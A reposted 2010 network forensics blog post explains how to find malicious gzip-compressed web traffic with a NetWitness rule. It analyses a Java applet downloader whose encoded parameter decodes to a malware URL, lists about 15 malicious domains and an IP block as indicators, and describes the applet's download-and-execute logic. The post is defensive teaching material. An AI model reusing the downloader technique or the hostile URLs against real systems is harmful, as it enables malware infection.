REPOST - ORIGINIALLY POSTED NOVEMBER 14, 2010
Something I’ve found unsettling for some time now is the drastically increased usage of gzip as a Content-Encoding transfer type from web servers. By default now, Yahoo, Google, Facebook, Twitter, Wikipedia, and many other organizations compress the content they send to your users. From that list alone, you can infer that most of the HTTP traffic on any given network is not transferred in plaintext, but rather as compressed bytes.
That means web content you’d expect to look like this on the wire (making it easily searchable for policy violations and security threats):
In reality, looks like this:
As it turns out, the two screenshot above are for the exact same network session, the later screenshot being from wireshark and showing the data sent by the webserver really is compressed and not discernable.
By extension, you can likely say that most real-time network forensics/monitoring tools are [realistically] “blind” to [plausibly] a majority of the web the traffic flowing into your organization.
Combined with the fact that a vast majority of compromises are delivered to clients via HTTP (at this time, typically through the use of javascript), my use of the word “unsettling” should be an understatement. This includes everything from “APT” types of threats (or whatever soapbox you stand on to describe the same thing), down to drive-by’s and mass exploitations.
The good news: Current trends in exploitation have given us very powerful methods for generic detection (eg: without needing “signatures,” or more precisely – preexisting knowledge about the details of particular vulnerabilities or exploits) by examining traits of javascript, iframes, html, pdf’s, etc.
The bad news: Webservers are reducing the chance of network technologies from detecting those conditions by compression based transfer (obfuscation).
I find no fault with organizations choosing to use gzip as their transfer type. HTTP is a horribly repetitive and redundant language (read: bloated). Every opening <tag> has an identical closing </tag>. XML is even worse. For massive sites with massive traffic, the redundancy and bloat of protocols like HTTP and XML translate directly to lost revenue via extremely large amounts of wasted bandwidth.
Nonetheless, as forensic engineers, our challenge is to discover and compensate for all the things proactive security technologies like AV, firewalls, IPS, etc. continually fail to identify and stop. Recently, I added the following rule on a customer’s network in NetWitness:
If you’re not familiar with the NetWitness rule syntax, the rule above does the following:
If the server application/version (as extracted by the protocol parsing engine) contains the string: “nginx,”
AND
If the Content-Encoding used by the server is gzip
THEN
Create a tag labeled “http_gzip_from_nginx” in a key called “monitors.”
In the Investigator GUI, you would see something like this in the “monitors” key:
Why nginx? As it turns out, a lot of hackers tend to use nginx webservers, so this seemed like a good place to start experimenting. The question I was trying to answer is:
If the content body of a web response is gzip’ed (so we can’t examine traits of “suspiciousness” inside the body), then what can we see outside the body to indicate this gzip’ed traffic is worth examining further?
We’ll revisit this question in later blog posts, but for now, nginx as a webserver is an amazingly powerful place to start! We’ll examine one such example in this post, with an additional post using the gzip + nginx combination. As the small screenshot above shows, there were 33 sessions meeting the criteria of gzip + nginx (out of about 50,000 sessions). With only 33 sessions, it’s possible to examine them by drilling into the packets of all 33, examining them each one-by-one (eg: brute-force forensic examination), but that would be poor forensic technique and defeat the entire point of a technical and educational network forensics blog! The examples in these series of blog posts will employ good forensic practices using “correlative techniques,” allowing us to have a good idea of what is inside the packet contents before we ever drill that deeply into the network data (an indication you are using good network forensics practices).
The first pivot point we’ll examine are countries. Keep in mind, this is after we used the rule above to include only network sessions where the server returned gzip compressed content, and where the webserver was some type of nginx. We could have manually done the same by first pivoting on the content type of gzip:
Doing the first pivot reduces the number of sessions we’re examining from about 50,000 down to 2,878. Then we can do a custom filter to only include servers with the string “nginx” within those 2,878 session. Doing so gives us the same 33 sessions mentioned above.
In those 33 sessions, the countries communicated with are:
Not only do we tend to see a higher degree of malicious traffic from countries like Latvia, it immediately looks suspicious simply because it’s an outlier in the list. (Don’t worry Latvia, we’ll pick on our own country in the next post!) Additionally, there’s only a single session to examine here, meaning drilling into the packet-level detail is an ok decision at this point.
In the request, we see the client requested the file “/th/inyrktgsxtfwylf.php” from the host “ertyi.net,” as shown next:
As expected, based on the meta information NetWitness already extracted, we see the gzip’ed reply from a nginx server:
Fortunately, Investigator makes it easy for us to examine gzip’ed content by right-clicking in the session display and selecting decode as compressed data:
Doing so shows us a MUCH different story!
The traffic appears to be obfuscated javascript. We can extract it from NetWitness (a few different ways) to clean it up and examine. I’ll skip those steps and just show the cleaned-up and nicely formatted content the webserver returned.
There are a few things to notice in here. At the very bottom of the image above, we clearly see encoded javascript, a trait extremely common to client-side exploit delivery and malicious webpages. We’ll save full javascript reverse engineering for another blog post.
But the worst (or most interesting) part is the decoding and evaluation for this encoded data, while implemented in javascript, is stored inside a TextArea HTML object! This technique makes the real logic invisible and indiscernible to most automated javascript reverse engineering tools.
Indeed, if we upload this webpage to one of my favorite js reversing sites (jsunpack, located at: http://jsunpack.jeek.org/dec/go), we see the following results when the site attempts to automatically reverse engineer the javascript:
Without going further into the process of reverse engineering the javascript (for now – we have an endless supply of blog posts coming!), we can be quite sure we’re looking at something suspicious. At the very least, we know for a fact we’re looking at something that does not make it easy to discern what it’s doing!
The telltale signs of “badness” don’t stop there. At the top of the decoded body data we saw an embedded java applet, as follows:
While we don’t know (yet) what the applet does, there’s a pretty strong indication it’s a downloader or C&C (command and control) application of some type. How can we make such a guess without knowing anything about it?
Look closely at the embedded parameter passed into the applet:
We can make a guess that the string contained in the “value” parameter is encoded data using a simple substitution cypher where “S”[parm] = “T”[actual] and “T”[parm] = “/”[actual]. If we made such a guess, then it’s possible the decoded parameter value actually starts with the string “http://”.
Of course, because we have the download of the jar file within our full packet capture and storage database, we’ll just extract it from NetWitness to validate our hunch and possibly learn more. In the below screenshot, I already performed the following steps:
The first line of code in the java applet takes the parameter passed to it (the encoded value we identified above), and hands it to a function called “b.” The result of that function is stored in a string variable called str1.
Following the decompiled java code to function “b,” we see the following:
It turns out the applet actually is using a simple substitution cypher, replacing one given character with another. When the parameter “RSS=,TT!;LBIB@STSRTYG$I=R=” is decoded, we end up with the string “http://uijn.net/th/fs7.php?i=1.”
The java malware then continues with additional string functions as shown next:
First, we see the declaration of str2 through str5, with values assigned to each.
Then, str6 through srt8 is simply the reversal of str2 through str4, resulting in the following strings:
Str6 = .exe
Str7 = java.io.tmpdir
Str8 = os.name
Combining that with the last three lines of code shown above, we see the following:
Str10 is a filename ending in “.exe” where the actual filename is a randomly generated number.
Str11 is the path to temporary files for the current user.
Str12 is the name of the Operating System the java malware is currently running on.
The last part of this java malware (that we’ll examine here anyways) is shown next:
First, it tests to see if the string “Windows” is contained anywhere in the name of the Operating System. If so, then it goes through the process of opening a connection to the URL (the one we decoded above), downloads the file, saves it to the temporary directory, then executes the file.
This file appears to be malware as a first-stage downloader for other executables that are likely far more malicious.
Even though a large amount of web traffic is coming into your organization gzip compressed, making most inline/real-time security products totally “blind” to what’s inside, we can use standard forensic principals to identify which of those sessions are worth examination. In this case, we combined to following traits to reduce 50,000 network sessions to a single one:
Once we drilled into that single session, we saw how trivial it was to use NetWitness to automatically decompress and content, extract it, then validate it as “bad.”
Does the process stop there? Of course not! If you had to repeat this process every time, not only would it make your job boring as heck, but would call into question the value you and your tools are really providing the organization in the first place! There are many ways to maximize the intelligence gained from the process just shown. I’ll highlight one method here, while saving others for later blog posts.
There are several interesting “indicators” gathered from this traffic so far. The ones I’ll focus on here are host names. In the request made by the client, we saw the following tag in the HTTP Request header:
Host: ertyi.net
In the java malware we decompiled, after decoding the encoded parameter value, we saw the executable to be downloaded was from the host “uijn.net.”
At this point, network rules should be added to firewalls, proxies, NetWitness intelligence feeds, and any other technology you have that can alert to other hosts going to either of those servers – preferably blocking all traffic to those servers.
But, can we extend our security perimeter in relation to the hackers using those servers?
Interestingly, we find both those domains are hosted on the same IP block: 194.8.250.60 and 194.8.250.61.
That leads to the question, “What other domains are hosted on those server?”
Normally I use http://www.robtex.com to answer questions like that, but in this case, robtex does not provide a lot of information about that question. It’s possible the hackers are brining-up and tearing-down DNS records as needed for the domain names they manage.
Another source of helpful information can be found querying the “Passive DNS replication” database hosted at: http://www.bfk.de/bfk_dnslogger.html Here, we can find an audit trail of all historically observed DNS replies pointing to IPs you submit queries about. In this case, we do indeed find valuable information, including about 40 unique host names that have been hosted on those two IP’s. A shortened list is included below showing some of the names that have been hosted there.
aeriklin.com
aijkl.net
asdfiz.net
asuyr.net
campag.net
iifgn.net
jhgi.net
jugv.net
kobqq.com
krclear.com
lilif.net
nadwq.com
oiuhx.net
pokiz.net
uijn.net
As we can see, none of them look immediately legitimate, so we can infer this is a hacking group using a set of servers for domains they have registered simply to be “thrown away” if any of those domain names are discovered and end up on a blacklist somewhere.
By combining a few pivot points and looking inside compressed web traffic most products ignore, from a single network session we proactively increased the security posture of your organization by creating an intelligence feed of nearly 40 hosts names and 2 IP’s. You could now audit DNS queries made by all hosts in your organization to see if other clients are compromised and doing look-ups when trying to communicate with those hosts.
For the truly paranoid (or safe, depending on how you look at it), you could also blackhole all traffic to those apparently malicious networks:
route: 194.8.250.0/23
origin: AS29557
Considering the Google Safe Browsing report for that AS, it’s probably not a bad idea!
Gary Golomb
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.